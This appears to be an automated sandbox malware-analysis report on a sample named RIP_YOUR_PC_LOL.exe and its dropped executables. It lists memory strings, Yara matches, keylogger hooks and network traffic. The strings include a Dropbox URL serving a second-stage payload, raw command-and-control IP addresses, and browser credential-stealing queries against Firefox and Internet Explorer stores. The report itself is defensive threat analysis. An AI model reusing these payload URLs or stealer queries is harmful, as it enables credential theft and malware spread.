                    Source: Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.438069908.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.co
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.712090794.0000000006EE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.439099390.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.439790741.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.438069908.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnY
                    Source: Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnm
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437773657.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.W
                    Source: Pluto Panel.exe, 00000005.00000003.437487558.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437239432.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436798009.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.436695339.0000000005C80000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000003.437023378.0000000005C80000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.zhongyicts.com.cnts
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp; String found in binary or memory: https://d.symcb.com/cps0%
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 22.exe, 0000000B.00000000.422804028.000000000042B000.00000008.00000001.01000000.0000000B.sdmp; String found in binary or memory: https://d.symcb.com/rpa0
                    Source: healastounding.exe, healastounding.exe, 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, healastounding.exe, 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, gay.exe, gay.exe, 00000008.00000000.411478373.00000000000D2000.00000002.00000001.01000000.00000009.sdmp, mediaget.exe, 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, mediaget.exe, 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://dl.dropbox.com/s/p84aaz28t0hepul/Pass.exe?dl=0
                    Source: Pluto Panel.exe; String found in binary or memory: https://login.yahoo.com/config/login
                    Source: Pluto Panel.exe, 00000005.00000002.705753147.0000000003691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://whatismyipaddress.com/
                    Source: Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://whatismyipaddress.comx&
                    Source: Pluto Panel.exe, 00000005.00000002.706003291.00000000036CE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.digicert.com/CPS0
                    Source: Pluto Panel.exe; String found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknown; DNS traffic detected: queries for: store-images.s-microsoft.com
                    Source: global traffic; HTTP traffic detected:
                        GET /?format=xml HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                        Host: api.ipify.org
                        Connection: Keep-Alive
                    Source: unknown; TCP traffic detected without corresponding DNS query: 80.87.192.115
                    Source: unknown; TCP traffic detected without corresponding DNS query: 172.98.92.42
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp; String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp; String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: Pluto Panel.exe; String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: Yara match; File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f18208.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.2.Pluto Panel.exe.f19c0d.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f19c0d.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9f22de.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f19c0d.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.1.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.9fa0eb.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f6fa72.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5731eca.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.12.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f19c0d.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.1.RIP_YOUR_PC_LOL.exe.9f22de.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f10000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f19c0d.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.9f86e6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.9f22de.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 5.0.Pluto Panel.exe.f18208.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.9f86e6.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.1.RIP_YOUR_PC_LOL.exe.9f86e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000005.00000002.706080641.00000000036DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000005.00000000.394040229.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000005.00000000.394636472.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000005.00000002.701277187.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.502131214.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000001.375725825.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000005.00000000.397247474.0000000000F12000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Pluto Panel.exe PID: 4236, type: MEMORYSTR
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, type: DROPPED
                    Source: Yara match; File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.2.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1f6c52e.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3479694.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.5a556c1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3474284.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.15.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1fdd5e1.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.206ac1d.13.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.59c8085.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.3479694.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 6.0.test.exe.da0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.935129.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.3.RIP_YOUR_PC_LOL.exe.596a627.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.95312e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000006.00000000.397644420.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000003.388952115.00000000059C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000000.374606826.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.538356356.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.693319449.0000000001F6B000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000000.405813841.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000000.394727625.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000000.399704980.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.381351381.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000006.00000002.701012196.0000000000DA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.382829254.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.383946223.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: RIP_YOUR_PC_LOL.exe PID: 6880, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: healastounding.exe PID: 3572, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: test.exe PID: 6236, type: MEMORYSTR
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\test.exe, type: DROPPED
                    Source: Yara match; File source: C:\Users\user\AppData\Roaming\healastounding.exe, type: DROPPED
                    Source: Pluto Panel.exe.0.dr, Form1.cs; .Net Code: HookKeyboard
                    Source: gay.exe.4.dr, kl.cs; .Net Code: VKCodeToUnicode
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs; .Net Code: HookKeyboard
                    Source: Opus.exe, 00000009.00000002.701598795.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: Opus.exe, 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: RegisterRawInputDevices

                    E-Banking Fraud

                    Source: Yara match; File source: RIP_YOUR_PC_LOL.exe, type: SAMPLE
                    Source: Yara match; File source: 9.2.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.0.Opus.exe.840000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.5b00000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.4474268.10.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.5b00000.7.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.4.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.4474268.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.0.Opus.exe.840000.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.3edeacc.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.0.Opus.exe.840000.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.3ed9c96.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.3edeacc.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.3ee30f5.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.healastounding.exe.902324.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce9ce8.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.2.Opus.exe.5b04629.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 9.0.Opus.exe.840000.2.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.14.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.12.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.902324.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.1ce97c4.11.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.0.healastounding.exe.900000.8.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.0.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.RIP_YOUR_PC_LOL.exe.ea57bf.9.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000009.00000000.414257385.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.707363158.0000000003ECB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000024.00000000.475797127.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.567040014.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000000.385235005.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.463698979.0000000000902000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000026.00000000.491059532.0000000000272000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000024.00000002.629223400.0000000000572000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.579383399.0000000004081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000000.371829021.0000000001893000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match; File source: 0000001C.00000002.514866763.0000000000922000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.546334194.0000000004474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
